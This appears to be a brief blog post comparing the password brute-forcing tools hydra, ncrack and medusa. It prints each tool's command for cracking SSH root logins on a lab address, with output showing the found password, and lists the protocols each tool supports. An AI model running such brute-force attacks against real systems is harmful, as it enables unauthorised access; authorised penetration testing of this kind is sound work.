# hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
[22][ssh] host: 10.10.10.10 login: root password: toor
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
# ncrack -p 22 –user root -P 500-worst-passwords.txt 10.10.10.10
Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: ‘root’ ‘toor’
# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]
Problems with VM?
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
medusaReceive returned no data
The answer is to use ncrack
Protocols supported include:
Hydra – TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA
Medusa – AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper,
Web Form
Ncrack – RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet
While ncrack has limited protocol support compared to Hydra and Medusa the only conclusion for this little test; when it comes to speed, reliability and the ability to hit RDP services ncrack wins!!